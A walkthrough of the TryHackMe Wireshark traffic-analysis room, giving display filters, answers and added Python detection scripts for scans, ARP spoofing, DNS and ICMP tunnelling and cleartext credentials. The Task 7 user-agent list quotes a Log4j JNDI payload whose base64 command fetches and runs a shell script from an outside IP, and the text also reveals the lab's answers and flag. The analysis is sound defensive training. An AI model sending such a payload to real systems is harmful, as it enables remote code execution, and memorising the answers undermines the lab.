Learn the basics of traffic analysis with Wireshark and how to find anomalies on your network!

Link: https://tryhackme.com/room/wiresharkpacketoperations

“In this room, we will cover the techniques and key points of traffic analysis with Wireshark and detect suspicious activities. Note that this is the third and last room of the Wireshark room trio, and it is suggested to visit the first two rooms stated below to practice and refresh your Wireshark skills before starting this one.”

“In the first two rooms, we have covered how to use Wireshark and do packet-level searches. Now, it is time to investigate and correlate the packet-level information to see the big picture in the network traffic, like detecting anomalies and malicious activities. For a security analyst, it is vital to stop and understand pieces of information spread in packets by applying the analyst’s knowledge and tool functionality. This room will cover investigating packet-level details by synthesising the analyst knowledge and Wireshark functionality for detecting anomalies and odd situations for a given case.”


Task 2: Nmap Scans

Use the “Desktop/exercise-pcaps/nmap/Exercise.pcapng” file.
What is the total number of the “TCP Connect” scans?

Ans: 1000

tcp.flags.syn == 1 and tcp.flags.ack == 0 and tcp.window_size > 1024

A connect scan goes through the operating system's own TCP stack, so each probe is a plain SYN (no ACK) carrying the OS default window size, and the three-way handshake completes before the scanner tears the connection down. Nmap's raw SYN-scan probes carry a window of 1024 or less, which is why the window size is what separates the two scan types in this capture.

Which scan type is used to scan the TCP port 80?

Ans: TCP Connect

tcp.port == 80

The SYN sent to port 80 carries a window larger than 1024, and following the stream shows the full handshake (SYN, SYN/ACK, ACK) before the scanner closes it; a half-open SYN scan would answer the SYN/ACK with a RST instead.

How many “UDP close port” messages are there?

Ans: 1083

icmp.type == 3 and icmp.code == 3

“icmp.type == 3”: ICMP type 3 is the Destination Unreachable message.

“icmp.code == 3”: within type 3, code 3 is Port Unreachable, the reply a host sends when a UDP datagram arrives at a port with no listener. Counting these messages therefore counts the closed UDP ports the scanner probed; an open or firewalled port produces no such reply.

Which UDP port in the 55–70 port range is open?

Ans: 68

udp.dstport >= 50 and udp.dstport <= 70

After filtering on destination ports between 50 and 70, four UDP ports show up: 53, 67, 68, and 69. The filter also matches the ICMP “Destination unreachable” replies, because Wireshark dissects the original UDP header quoted inside each ICMP error. Inspecting those ICMP packets shows that ports 67, 53, and 69 are closed; port 68 never drew an error, so it is the open (strictly, open|filtered) port in the range.

For example, in the second image, the first ICMP error quotes the original request from 10.10.60.7:67. The same holds for the other ICMP errors.
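The rules the three display filters above encode (SYN-only probes split on window size; ICMP type 3 code 3 quoting the probed UDP port; ports with no error left as open|filtered) as a small classifier, added here as an example and not part of the room or its pcap. The packet records are constructed by hand; 192.0.2.10 as the scanner and 192.0.2.20 as the target, and the field names on the Packet class, are assumptions of this example.

```python
"""Classify scan probes the way the Task 2 display filters do.

Added example, not from the TryHackMe room or the pcap. The packet records
below are constructed by hand; 192.0.2.10 is the scanner and 192.0.2.20 the
target (documentation addresses, assumed). The rules mirror the filters:
  - TCP connect scan: SYN set, ACK clear, window size > 1024
  - TCP SYN (half-open) scan: SYN set, ACK clear, window size <= 1024
  - closed UDP port: ICMP type 3 code 3 quoting the probed UDP port
"""
from collections import Counter
from dataclasses import dataclass
from typing import Optional


@dataclass
class Packet:
    proto: str                      # "tcp", "udp" or "icmp"
    src: str
    dst: str
    dport: int = 0                  # TCP/UDP destination port
    syn: bool = False
    ack: bool = False
    window: int = 0                 # TCP window size
    icmp_type: Optional[int] = None
    icmp_code: Optional[int] = None
    quoted_dport: int = 0           # UDP port from the header quoted in an ICMP error


def tcp_scan_type(p: Packet) -> Optional[str]:
    """SYN-only probes are scan probes; the window size tells the two scans apart.
    Anything with ACK set (replies, established traffic) is not a probe."""
    if p.proto != "tcp" or not p.syn or p.ack:
        return None
    return "TCP Connect" if p.window > 1024 else "TCP SYN"


def count_tcp_scans(packets) -> Counter:
    return Counter(t for t in map(tcp_scan_type, packets) if t)


def scan_type_for_port(packets, port: int) -> Optional[str]:
    """Answer 'which scan type hit port N': look at the probe sent to that port."""
    for p in packets:
        if p.dport == port and tcp_scan_type(p):
            return tcp_scan_type(p)
    return None


def udp_closed_ports(packets) -> set:
    """ICMP type 3 = Destination Unreachable, code 3 = Port Unreachable: the
    target's stack had no listener on the quoted UDP port."""
    return {p.quoted_dport for p in packets
            if p.proto == "icmp" and p.icmp_type == 3 and p.icmp_code == 3}


def udp_open_or_filtered(packets, lo: int, hi: int) -> list:
    """Probed UDP ports in [lo, hi] that drew no Port Unreachable. Nmap reports
    these as open|filtered: silence can also mean a firewall dropped the probe."""
    probed = {p.dport for p in packets if p.proto == "udp" and lo <= p.dport <= hi}
    return sorted(probed - udp_closed_ports(packets))


# Constructed traffic: two connect-scan probes, one SYN/ACK reply, two SYN-scan
# probes, four UDP probes and three port-unreachable answers.
SCANNER, TARGET = "192.0.2.10", "192.0.2.20"
SAMPLE = [
    Packet("tcp", SCANNER, TARGET, dport=80, syn=True, window=64240),
    Packet("tcp", SCANNER, TARGET, dport=443, syn=True, window=64240),
    Packet("tcp", TARGET, SCANNER, dport=51512, syn=True, ack=True, window=29200),
    Packet("tcp", SCANNER, TARGET, dport=22, syn=True, window=1024),
    Packet("tcp", SCANNER, TARGET, dport=25, syn=True, window=1024),
    Packet("udp", SCANNER, TARGET, dport=53),
    Packet("udp", SCANNER, TARGET, dport=67),
    Packet("udp", SCANNER, TARGET, dport=68),
    Packet("udp", SCANNER, TARGET, dport=69),
    Packet("icmp", TARGET, SCANNER, icmp_type=3, icmp_code=3, quoted_dport=53),
    Packet("icmp", TARGET, SCANNER, icmp_type=3, icmp_code=3, quoted_dport=67),
    Packet("icmp", TARGET, SCANNER, icmp_type=3, icmp_code=3, quoted_dport=69),
]

if __name__ == "__main__":
    print(dict(count_tcp_scans(SAMPLE)))          # {'TCP Connect': 2, 'TCP SYN': 2}
    print(scan_type_for_port(SAMPLE, 80))         # TCP Connect
    print(sorted(udp_closed_ports(SAMPLE)))       # [53, 67, 69]
    print(udp_open_or_filtered(SAMPLE, 55, 70))   # [68]
```

The window-size split is a heuristic tied to Nmap's defaults: a scanner that crafts its own SYNs with a large window, or a host whose default window is small, would be misclassified, so treat it as a lead to confirm by following the stream, not as proof.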


Task 3: ARP Poisoning & Man In The Middle!

Use the “Desktop/exercise-pcaps/arp/Exercise.pcapng” file.
What is the number of ARP requests crafted by the attacker?

Ans: 284

We first need to identify who the attacker is. Wireshark flags an IP address that is claimed by more than one MAC address, which is exactly what ARP poisoning produces:

arp.duplicate-address-detected or arp.duplicate-address-frame

We have identified that the attacker has a MAC address of “00:0c:29:e2:18:b4”.

Let’s now craft a query to filter all ARP requests from the MAC address of the attacker.

arp.opcode == 1 and arp.src.hw_mac == 00:0c:29:e2:18:b4

What is the number of HTTP packets received by the attacker?

Ans: 90

We will modify the query to filter all http packets received by the attacker.

http and eth.addr == 00:0c:29:e2:18:b4

Filtering on the attacker's own IP address shows nothing: the victim's HTTP traffic is addressed to the real server's IP and only passes through the attacker because the poisoned ARP entries point at the attacker's MAC. Filtering on the MAC address (or on the spoofed IP address) is what reveals the intercepted packets.

What is the number of sniffed username&password entries?

Ans: 6

We first need to identify the login points or URL for authentication.

http and eth.addr == 00:0c:29:e2:18:b4

We see that the attacker sent a “GET” request to a login page. In the packet details under HTTP, we see the host name hosting the login page. We will apply that as filter.

We will then restrict the query to POST requests (the http.request.method field), since that is where submitted form data travels. We get ten packets.

Go through all the packets; some will contain credentials in the packet details under the HTML Form URL Encoded section. Below is an example.

I realized soon after I answered the last two questions below that we can modify the filter to match any value in that field, excluding empty strings.

urlencoded-form matches ".+"

What is the password of the “Client986”?

Ans: clientnothere!

From the previous packet, we know that the data was captured in the HTML Form URL Encoded section. The Display Filter Expression dialog helps build a filter that Wireshark accepts. Note that matches takes a regular expression and is case-insensitive by default, so the lowercase “client986” still finds “Client986”; contains, by comparison, is a case-sensitive byte match.

urlencoded-form matches "client986"

What is the comment provided by the “Client354”?

Ans: Nice work!

Same concept as the previous question: the comment is just another field in the same URL-encoded form body, so the same filter on the client's name finds it.

urlencoded-form matches "client354"

Task 4: Identifying Hosts: DHCP, NetBIOS and Kerberos

Use the “Desktop/exercise-pcaps/dhcp-netbios-kerberos/dhcp-netbios.pcap” file.
What is the MAC address of the host “Galaxy A30”?

Ans: 9a:81:41:cb:96:6c

dhcp.option.hostname contains "A30"

How many NetBIOS registration requests does the “LIVALJM” workstation have?

Ans: 16

Let’s create a query using the Display Filter Expression. The first part builds an NBNS registration request filter (the nbns.flags.opcode field, where 5 is a registration), and the second part keeps only the NBNS names (nbns.name) that match the workstation “LIVALJM”.

Which host requested the IP address “172.16.13.85”?

Ans: Galaxy-A12

dhcp.option.dhcp == 3 && dhcp.option.requested_ip_address == 172.16.13.85

dhcp.option.dhcp is the DHCP Message Type option (option 53); the value 3 is a DHCP Request, the message in which a client asks for a specific address, carried in the Requested IP Address option. If the Host Name column is not displayed, right-click the Host Name field in the DHCP packet details and apply it as a column; otherwise, read the host name from the DHCP packet details pane.

Use the “Desktop/exercise-pcaps/dhcp-netbios-kerberos/kerberos.pcap” file.
What is the IP address of the user “u5”? (Enter the address in defanged format.)

Ans: 10[.]1[.]12[.]2

kerberos.CNameString contains "u5"

Defang the IP address using cyberchef.

What is the hostname of the available host in the Kerberos packets?

Ans: xp1$

kerberos.CNameString contains "$"

Values that end with “$” are host names, and the ones without it are usernames.


Task 5: Tunneling Traffic: DNS and ICMP

Use the “Desktop/exercise-pcaps/dns-icmp/icmp-tunnel.pcap” file.
Investigate the anomalous packets. Which protocol is used in ICMP tunnelling?

Ans: SSH

data.len > 64 and icmp

Normal echo request and reply payloads are small and uniform; a tunnel needs room for the protocol it carries, so oversized ICMP packets are the first sign. That filter alone still leaves too many packets to inspect by hand.

So we narrow it further with the names of protocols commonly carried or exfiltrated through a tunnel, such as SSH, FTP, and HTTP, searched for as strings in the ICMP payload:

(data.len > 64) and (icmp contains "ssh" or icmp contains "ftp" or icmp contains "tcp" or icmp contains "http")

We get three results. Note that contains is a case-sensitive byte match, so “ssh” finds the lowercase service and algorithm names exchanged during SSH authentication but not the uppercase “SSH-2.0” version banner; icmp matches "ssh" is case-insensitive and would catch both. Inspect one of the packets and focus on the packet bytes pane.

The strings on the right-hand side (the ASCII dump) are the ones seen in SSH protocol negotiation: key exchange and encryption algorithm names and authentication method names.

Use the “Desktop/exercise-pcaps/dns-icmp/dns.pcap” file.
Investigate the anomalous packets. What is the suspicious main domain address that receives anomalous DNS queries? (Enter the address in defanged format.)

Ans: dataexfil[.]com

dns.qry.name.len > 15 and !mdns

We got over 30,000 packets. Imagine going over each one individually.

I modified the query and increased the query name length to 40 to look for DNS names with particularly long lengths, which is highly suspicious for a normal DNS name.

dns.qry.name.len > 40 and !mdns

We can also use the following query or modify it if we are looking for a specific top-level domain such as “.com”

dns.qry.name.len > 40 and !mdns && dns.qry.name contains ".com"
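The length filter above leaves a pile of long names; the useful next step is to group them by their main domain and ask which domain is receiving many distinct, encoded-looking subdomains. The script below does that and is an added example, not code from the room or its pcap. The query names are constructed; “dataexfil.com” is reused as the suspicious domain so the output matches this task. Two simplifications are assumptions of this example: the main domain is taken as the last two labels (no Public Suffix List), and mDNS is approximated by the .local zone because the records carry no UDP port.

```python
"""Find the domain behind anomalously long DNS query names.

Added example, not part of the room or its pcap. The query names below are
constructed; "dataexfil.com" is used as the suspicious domain so the output
lines up with this task, the other names are ordinary look-ups. The length
threshold mirrors the dns.qry.name.len > 40 filter used above.
"""
from collections import Counter


def main_domain(qname: str, labels: int = 2) -> str:
    """Registrable domain by taking the last `labels` labels. Assumed shortcut:
    without the Public Suffix List, "host.example.co.uk" would yield "co.uk"."""
    parts = qname.rstrip(".").lower().split(".")
    return ".".join(parts[-labels:])


def is_mdns_name(qname: str) -> bool:
    """Stand-in for the !mdns exclusion. Wireshark keys mDNS on UDP port 5353;
    with only names to go on we drop the .local zone mDNS uses (assumption)."""
    return qname.rstrip(".").lower().endswith(".local")


def is_hex_label(label: str, min_len: int = 16) -> bool:
    """Leftmost label made only of hex digits: a common way tunnels encode
    chunks of data. Base32/base64 carriers need a check against their alphabet."""
    return len(label) >= min_len and all(c in "0123456789abcdef" for c in label.lower())


def long_query_domains(qnames, min_len: int = 40) -> Counter:
    """Count query names longer than min_len per main domain, skipping mDNS."""
    counts = Counter()
    for q in qnames:
        if is_mdns_name(q) or len(q.rstrip(".")) <= min_len:
            continue
        counts[main_domain(q)] += 1
    return counts


def suspect_report(qnames, min_len: int = 40):
    """Per main domain: (domain, long-query count, distinct leftmost labels,
    hex-looking labels). A tunnel produces many distinct encoded labels under
    one domain; a long but legitimate CDN name produces one or two."""
    rows = {}
    for q in qnames:
        q = q.rstrip(".")
        if is_mdns_name(q) or len(q) <= min_len:
            continue
        dom, label = main_domain(q), q.split(".")[0]
        count, labels, hexed = rows.get(dom, (0, set(), 0))
        rows[dom] = (count + 1, labels | {label}, hexed + is_hex_label(label))
    report = [(dom, c, len(l), h) for dom, (c, l, h) in rows.items()]
    return sorted(report, key=lambda r: (r[1], r[3]), reverse=True)


def defang(domain: str) -> str:
    return domain.replace(".", "[.]")


def top_suspect(qnames, min_len: int = 40):
    report = suspect_report(qnames, min_len)
    return defang(report[0][0]) if report else None


# Constructed query names. The three 40-character hex labels stand in for
# data chunks carried in subdomains; the long CDN-style name shows that
# length alone also catches legitimate hosts.
SAMPLE_QUERIES = [
    "www.google.com",
    "safebrowsing.googleapis.com",
    "r3---sn-4g5e6nz7.googlevideo.com",
    "_googlecast._tcp.local",
    "3e2a9b1c4d5f6e7a8b9c0d1e2f3a4b5c6d7e8f9a.dataexfil.com",
    "0f1e2d3c4b5a69788796a5b4c3d2e1f00f1e2d3c.dataexfil.com",
    "deadbeefcafef00d0123456789abcdef01234567.dataexfil.com",
    "cdn-assets-long-hostname-for-a-static-site.example.net",
]

if __name__ == "__main__":
    for dom, count, distinct, hexed in suspect_report(SAMPLE_QUERIES):
        print(f"{defang(dom):<22} long={count} distinct_labels={distinct} hex_labels={hexed}")
    print(top_suspect(SAMPLE_QUERIES))   # dataexfil[.]com
```

On a real capture, feed it the dns.qry.name column exported from Wireshark (File → Export Packet Dissections → As CSV) or from tshark, and raise min_len if ordinary CDN names dominate the report.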

Task 6: Cleartext Protocol Analysis: FTP

Use the “Desktop/exercise-pcaps/ftp/ftp.pcap” file.
How many incorrect login attempts are there?

Ans: 737

ftp.response.code == 530

What is the size of the file accessed by the “ftp” account?

Ans: 39424

ftp.response.code == 213

FTP reply code 213 is “File status”, the response to a SIZE (or STAT) request; the “arg” value of that reply is readable text containing the file size in bytes.

The adversary uploaded a document to the FTP server. What is the filename?

Ans: resume.doc

ftp.request.command == "RETR"

The FTP command “RETR” is used to retrieve (or download) files or documents from the FTP server to our local system.

Not sure if the question meant to ask about uploading documents to the FTP server because the ftp command for that is “STOR” and the uploaded file was different.

The adversary tried to assign special flags to change the executing permissions of the uploaded file. What is the command used by the adversary?

Ans: CHMOD 777

ftp contains "CHMOD"

In FTP the permission change is requested through the SITE command, as “SITE CHMOD 777” followed by the filename, which is why the filter searches the packet for the string rather than matching ftp.request.command. “CHMOD” itself is the Unix command for modifying file permissions using numeric or symbolic representation.


Task 7: Cleartext Protocol Analysis: HTTP

Use the “Desktop/exercise-pcaps/http/user-agent.cap” file.

Investigate the user agents. What is the number of anomalous “user-agent” types?

Ans: 6

http.user_agent

Filter packets with an HTTP user agent. Select one of the packets and apply the “User-Agent” field as a column. We then have to go through each “User-Agent” value and identify the legitimate and illegitimate ones.

The hint actually gave us the first user-agent.

  1. Mozilla/5.0 (Windows; U; Windows NT 6.4; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
  2. Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)
  3. Wfuzz/2.4
  4. sqlmap/1.4#stable (http://sqlmap.org)
  5. ${jndi:ldap://45.137.21.9:1389/Basic/Command/Base64/d2dldCBodHRwOi8vNjIuMjEwLjEzMC4yNTAvbGguc2g7Y2htb2QgK3ggbGguc2g7Li9saC5zaA==}
  6. Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:100.0) Gecko/20100101 Firefox/100.0

What is the packet number with a subtle spelling difference in the user agent field?

Ans: 52

This is a needle in a haystack because at first glance nothing seems suspicious; the anomalous entry is only found by comparing each user-agent string character by character against the genuine browser strings.

Use the “Desktop/exercise-pcaps/http/http.pcapng” file.
Locate the “Log4j” attack starting phase. What is the packet number?

Ans: 444

With this task, we will be able to answer the last two questions.

(http.user_agent contains "$") or (http.user_agent contains "==")

Copy the value of the User-Agent, take the Base64 part after “/Base64/”, and decode it with CyberChef.

This is the attack's starting phase, as seen from the decoded command: “wget” retrieves the bash script “lh.sh” from the hosting address, the script's permissions are changed to executable, and the malicious file is then executed.

Locate the “Log4j” attack starting phase and decode the base64 command. What is the IP address contacted by the adversary? (Enter the address in defanged format and exclude “{}”.)

Ans: 62[.]210[.]130[.]250


Task 8: Encrypted Protocol Analysis: Decrypting HTTPS

Use the “Desktop/exercise-pcaps/https/Exercise.pcap” file.

What is the frame number of the “Client Hello” message sent to “accounts.google.com”?

Ans: 16

(http.request or tls.handshake.type == 1) and !(ssdp)

“tls.handshake.type == 1” matches the TLS Client Hello, the first handshake message a client sends to a server. The server name the client wants is in the Client Hello's SNI extension (tls.handshake.extensions_server_name), which is how the frame for accounts.google.com is picked out of the list.

Decrypt the traffic with the “KeysLogFile.txt” file. What is the number of HTTP2 packets?

Ans: 115

Adding the key log file: “Edit → Preferences → Protocols → TLS”, then set “(Pre)-Master-Secret log filename” to the path of KeysLogFile.txt. Wireshark uses the CLIENT_RANDOM entries in that file to recover the session keys of the captured TLS sessions. Then filter only http2 packets.

Go to Frame 322. What is the authority header of the HTTP2 packet? (Enter the address in defanged format.)

Ans: safebrowsing[.]googleapis[.]com

Press ctrl+g and go to packet 322.

In the packet details pane, we see the header authority. Defang the address in cyberchef.

Investigate the decrypted packets and find the flag! What is the flag?

Ans: FLAG{THM-PACKETMASTER}

In the “File → Export Objects → HTTP” list window, there are two files, one of which looks suspicious. So let’s go to its packet number and see what it is.

The flag can be seen in the Line-based text data section of the packet details pane.


Task 9 Bonus: Hunt Cleartext Credentials!

Use the “Desktop/exercise-pcaps/bonus/Bonus-exercise.pcap” file.

What is the packet number of the credentials using “HTTP Basic Auth”?

Ans: 237

What is the packet number where “empty password” was submitted?

Ans: 170

If we click on the packet number in the credentials window, wireshark directs us to the packet as seen from the image above.

Browse through the packets. Packet 170 has no value in the Request arg field: the PASS command was sent with an empty password.

Another way to look for empty credentials submission for FTP packets is to select one of the packets where authentication is being requested. Select the “Request command: PASS” from the packet details, then left-click it and drag all the way to the display filter, or simply by right-clicking and applying it as a display filter.

The result displays all FTP packets carrying a PASS command; a PASS with an empty argument is an empty-password submission.
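Task 3 (form data in POST bodies) and this bonus task (HTTP Basic Auth and FTP PASS commands, including an empty password) are the same hunt over three places where credentials travel in cleartext. The script below does all three and is an added example, not code from the room or its pcap: every request and FTP command in it is constructed, the frame numbers are invented labels, and the field-name lists USER_KEYS and PASS_KEYS are assumptions. The "YWRtaW46cGFzc3dvcmQ=" token is base64 of "admin:password".

```python
"""Hunt cleartext credentials in captured HTTP and FTP text.

Added example, not part of the room or its pcap; every request below is
constructed and the frame numbers are invented labels. It covers the three
places the tasks look: HTML form URL-encoded POST bodies (Task 3), the HTTP
Basic Authorization header and FTP USER/PASS commands (this bonus task), and
it flags an empty password the way the "Request arg" check does above.
"""
import base64
from urllib.parse import parse_qs

USER_KEYS = ("username", "user", "uname", "login", "email")   # assumed field names
PASS_KEYS = ("password", "pass", "passwd", "pwd")


def _first(fields, keys):
    for k in keys:
        if k in fields:
            return fields[k][0]
    return None


def from_form_body(body: str):
    """application/x-www-form-urlencoded body -> credentials, or None when the
    form carries no password field (a comment form, say). keep_blank_values
    keeps "password=" visible instead of dropping the empty field."""
    fields = parse_qs(body, keep_blank_values=True)
    password = _first(fields, PASS_KEYS)
    if password is None:
        return None
    return {"method": "form", "user": _first(fields, USER_KEYS), "password": password}


def from_basic_auth(header_value: str):
    """'Basic <base64(user:password)>' -> credentials; other schemes -> None."""
    scheme, _, token = header_value.strip().partition(" ")
    if scheme.lower() != "basic":
        return None
    try:
        raw = base64.b64decode(token, validate=True).decode("utf-8", "replace")
    except ValueError:          # binascii.Error is a ValueError: bad padding/alphabet
        return None
    user, _, password = raw.partition(":")
    return {"method": "basic", "user": user, "password": password}


def hunt_http(frame: int, request_text: str):
    """request_text is one raw HTTP request (headers + body, CRLF separated)."""
    head, _, body = request_text.partition("\r\n\r\n")
    found = []
    for line in head.split("\r\n")[1:]:          # skip the request line
        name, _, value = line.partition(":")
        if name.strip().lower() == "authorization":
            cred = from_basic_auth(value)
            if cred:
                found.append({"frame": frame, **cred})
    cred = from_form_body(body) if body else None
    if cred:
        found.append({"frame": frame, **cred})
    return found


def hunt_ftp(commands):
    """commands: [(frame, 'USER x'), (frame, 'PASS y'), ...] from one control
    connection in capture order; each PASS is paired with the preceding USER."""
    found, user = [], None
    for frame, line in commands:
        verb, _, arg = line.strip().partition(" ")
        if verb.upper() == "USER":
            user = arg
        elif verb.upper() == "PASS":
            found.append({"frame": frame, "method": "ftp", "user": user, "password": arg})
            user = None
    return found


def hunt(http_requests, ftp_commands):
    found = [c for frame, text in http_requests for c in hunt_http(frame, text)]
    found += hunt_ftp(ftp_commands)
    return sorted(found, key=lambda c: c["frame"])


def empty_password_frames(findings):
    return [c["frame"] for c in findings if c["password"] == ""]


CRLF = "\r\n"
# Constructed requests; "YWRtaW46cGFzc3dvcmQ=" is base64("admin:password").
SAMPLE_HTTP = [
    (120, CRLF.join(["POST /login HTTP/1.1", "Host: shop.test",
                     "Content-Type: application/x-www-form-urlencoded", "",
                     "username=Client986&password=clientnothere%21"])),
    (237, CRLF.join(["GET /admin/ HTTP/1.1", "Host: shop.test",
                     "Authorization: Basic YWRtaW46cGFzc3dvcmQ=", "", ""])),
    (301, CRLF.join(["POST /comment HTTP/1.1", "Host: shop.test",
                     "Content-Type: application/x-www-form-urlencoded", "",
                     "username=Client354&comment=Nice+work%21"])),
]
SAMPLE_FTP = [
    (160, "USER anonymous"), (170, "PASS "),          # empty password
    (181, "USER ftp"), (185, "PASS ftp@example.test"),
]

if __name__ == "__main__":
    for c in hunt(SAMPLE_HTTP, SAMPLE_FTP):
        print(c)
    print("empty password in frames:", empty_password_frames(hunt(SAMPLE_HTTP, SAMPLE_FTP)))  # [170]
```

Wireshark's own Tools → Credentials window does the same pairing for the protocols it knows; the value of a script like this is that the field-name lists can be extended for a custom login form that Wireshark does not recognise.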


Task 10 Bonus: Actionable Results!

Use the “Desktop/exercise-pcaps/bonus/Bonus-exercise.pcap” file.

Create firewall rules by using “Tools → Firewall ACL Rules”

Select packet number 99. Create a rule for “IPFirewall (ipfw)”. What is the rule for “denying source IPv4 address”?

Change the rules for “IPFirewall(ipfw)”

Ans: add deny ip from 10.121.70.151 to any in

Select packet number 231. Create “IPFirewall” rules. What is the rule for “allowing destination MAC address”?

Ans: add allow MAC 00:d0:59:aa:af:80 any in

Deselect Deny.


